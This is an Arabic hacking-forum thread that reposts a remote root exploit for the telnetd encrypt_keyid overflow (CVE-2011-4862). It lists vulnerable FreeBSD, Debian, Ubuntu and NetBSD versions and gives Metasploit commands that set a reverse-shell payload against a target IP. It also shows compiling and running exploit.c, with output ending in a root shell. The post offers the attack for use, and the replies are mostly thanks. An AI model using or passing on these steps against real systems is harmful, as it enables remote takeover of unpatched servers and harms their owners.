![]() |
![]() |
![]() |
التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"
مطلوب مشرفين على كامل اقسام المنتدى
|
|
![]() |
|
|
|
![]() |
|
![]() |
|
|
أدوات الموضوع | انواع عرض الموضوع |
|
|
المشاركة رقم: 1 | ||||||||||||||||||||||||||||||||||||||||||||||||||||
شكراً: 30
تم شكره 55 مرة في 33 مشاركة
|
[]
الملف المصاب encrypt.c CVE-2011-4862 بداية نبدء بى [] [] Overflow Exploit Targets FreeBSD 8.2 2 - FreeBSD 8.1 3 - FreeBSD 8.0 4 - FreeBSD 7.3/7.4 5 - FreeBSD 7.0/7.1/7.2 6 - FreeBSD 6.3/6.4 7 - FreeBSD 6.0/6.1/6.2 8 - FreeBSD 5.5 9 - FreeBSD 5.3 بستخدام ال metasploit كود:
$ msfconsole ## ### ## ## ## ## #### ###### #### ##### ##### ## #### ###### ####### ## ## ## ## ## ## ## ## ## ## ### ## ####### ###### ## ##### #### ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ##### ## ## ## ## ## ## ## #### ### ##### ##### ## #### #### #### ### ## msf > use exploit/freebsd/telnet/telnet_encrypt_keyid msf exploit(telnet_encrypt_keyid) > show payloads msf exploit(telnet_encrypt_keyid) > set PAYLOAD generic/shell_reverse_tcp msf exploit(telnet_encrypt_keyid) > set LHOST [MY IP ADDRESS] msf exploit(telnet_encrypt_keyid) > set RHOST [TARGET IP] msf exploit(telnet_encrypt_keyid) > exploit كود:
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb كود بلغة HTML:
http://www.securityfocus.com/bid/51182/exploit بنسبة لى [] Root Exploit Targets Ubuntu GNU/Linux 10.04, Inetutils Server (i386) Ubuntu GNU/Linux 10.04, Heimdal Server (i386) Debian GNU/Linux stable 6.0.3, Inetutils Server (i386) Debian GNU/Linux stable 6.0.3, Heimdal Server (i386) Debian GNU/Linux stable 6.0.3 Inetutils (SPARC) Debian GNU/Linux stable 6.0.3 Heimdal Server (SPARC) FreeBSD 8.0 (i386) FreeBSD 8.1 (i386) FreeBSD 8.2 (i386) NetBSD 5.1 (i386) كود:
gcc exploit.c -o exploit ./exploit 127.0.0.1 23 1 [<] Succes reading intial server request 3 bytes [>] Telnet initial encryption mode and IV sent [<] Server response: 8 bytes read [>] First payload to overwrite function pointer sent [<] Server response: 6 bytes read [>] Second payload to triger the function pointer[*] got shell? uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) منقول للفايده سسلام*/
|
||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||
| 2 أعضاء قالوا شكراً لـ cold على المشاركة المفيدة: |
ApOcalYpse (12/02/2012),
Dz.kH4 (12/02/2012)
|
|
|
المشاركة رقم: 2 | ||||||||||||
|
يعطيك ربى آلعآفية |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 3 | ||||||||||||
|
جزاك الله خيرا |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 4 | ||||||||||||
|
بارك الله في |
||||||||||||
|
|
||||||||||||
|
|
المشاركة رقم: 5 | ||||||||||||
|
بارك الله فيك موضوع جميل جدا |
||||||||||||
|
|
||||||||||||
![]() |
| مواقع النشر (المفضلة) |
| حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف) | |
(أظهر الكل)
الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 27
|
|
| 3b6 , abu-wissam , ApOcalYpse , BELHADJ47 , cold , الديلر الفلسطيني , Dr@S!L3NT H!LL , Dz.kH4 , ذاكريف , elouldja , gholoom , Gomina7 , kanoticx , love511 , mehdi_dz , Mr.Inj3ct0r , NuevoAsesino , SaBeR-Dz , sanfour25 , SATLAM , sko0or , Smail002 , sniffer , somar hacker , V!rù$ No!r , ViRuS_Ra3cH , wassar |
| أدوات الموضوع | |
| انواع عرض الموضوع | |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| [remote exploits] - Telnetd encrypt_keyid: Remote Root function pointer overwrite | ADMINISTRATOR | قسم الثغرات | 0 | 27/12/2011 13:40 |
| [remote exploits] - DreamBox DM800 1.5rc1 Remote Root File Disclosure Exploit | ADMINISTRATOR | قسم الثغرات | 0 | 26/11/2011 14:00 |
| [remote exploits] - Bison FTP Server v3.5 Multiple Remote Root BOF Exploit (MSF) | ADMINISTRATOR | قسم الثغرات | 0 | 04/09/2011 16:30 |
| [remote exploits] - HP Data Protector Remote Root Shell for Linux | ADMINISTRATOR | قسم الثغرات | 0 | 10/08/2011 11:27 |
| [remote exploits] - ProFTPD 1.3.3c compromised source remote root Trojan | ADMINISTRATOR | قسم الثغرات | 0 | 02/12/2010 20:50 |
![]() |
![]() |
![]() |